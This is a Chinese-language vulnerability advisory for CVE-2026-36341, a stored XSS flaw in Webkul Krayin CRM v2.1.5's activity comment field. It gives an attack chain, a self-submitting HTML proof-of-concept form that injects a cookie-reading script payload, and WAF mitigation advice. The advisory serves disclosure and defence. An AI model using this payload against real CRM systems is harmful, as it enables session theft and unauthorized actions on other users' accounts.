CVE-2026-36341: Krayin CRM存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2026-36341

漏洞类型

XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Webkul Krayin CRM

漏洞概述

Webkul Krayin CRM v2.1.5版本中存在一处跨站脚本（XSS）安全漏洞。该漏洞源于应用程序在处理活动创建请求时，未能对/admin/activities/create端点中用户提交的评论字段进行充分的输入过滤和清理。由于系统未对特殊字符进行转义，攻击者可注入恶意脚本。当权限较低的用户（PR:L）利用此漏洞注入Payload后，一旦其他用户查看了相关活动页面，恶意脚本将在其浏览器中执行，从而导致窃取会话凭证或进行恶意操作。

技术细节

该漏洞属于存储型跨站脚本攻击（Stored XSS）。漏洞产生的根本原因是Webkul Krayin CRM在活动管理模块中缺乏对用户输入的上下文感知输出编码。具体而言，当攻击者向`/admin/activities/create`接口发送POST请求时，应用程序直接将`comment`参数的内容原样存储到数据库中，未经过滤掉`<script>`、`onerror`等危险标签或属性。当管理员或其他用户访问受影响的活动详情页面时，后端应用从数据库读取该恶意评论并将其直接嵌入到HTTP响应的HTML源码中。浏览器解析HTML时执行了其中的JavaScript代码。结合CVSS向量（AV:N/AC:L/PR:L/UI:R/S:C），攻击者需要低权限账号，且需要诱导用户交互（UI:R）才能触发，但由于作用域为S:C（Scope Changed），攻击影响可扩展到原系统上下文之外。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标系统正在使用Webkul Krayin CRM v2.1.5，并确认/admin/activities/create接口可访问。

STEP 2

2. 获取凭证

攻击者注册或获取一个低权限账户（PR:L），登录系统。

STEP 3

3. 注入Payload

攻击者在创建活动时，在评论字段中插入恶意JavaScript代码（如<script>alert(1)</script>）并提交。

STEP 4

4. 诱导访问

攻击者等待或诱导管理员及其他具有权限的用户访问包含该恶意评论的活动详情页面。

STEP 5

5. 执行攻击

受害者的浏览器加载页面时解析恶意脚本，导致XSS攻击执行，可能窃取Cookie或执行未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
  PoC for CVE-2026-36341 (Stored XSS in Krayin CRM)
  Target Endpoint: /admin/activities/create
  Vulnerable Parameter: comment
-->

<html>
  <body>
    <form action="http://target-domain.com/admin/activities/create" method="POST">
      <input type="hidden" name="type" value="call" />
      <input type="hidden" name="comment" value="<script>alert(document.cookie);</script>" />
      <input type="hidden" name="participant" value="1" />
      <input type="submit" value="Submit Request" />
    </form>
    <script>
      // Automatically submit the form to demonstrate the vulnerability
      document.forms[0].submit();
    </script>
  </body>
</html>

影响范围

Webkul Krayin CRM 2.1.5

Webkul Krayin CRM < 2.1.6

防御指南

临时缓解措施

建议管理员暂时禁用活动创建功能中的评论输入，或通过Web应用防火墙（WAF）添加规则，拦截包含常见XSS攻击特征（如<script>, javascript:等）的流量，直至完成版本升级。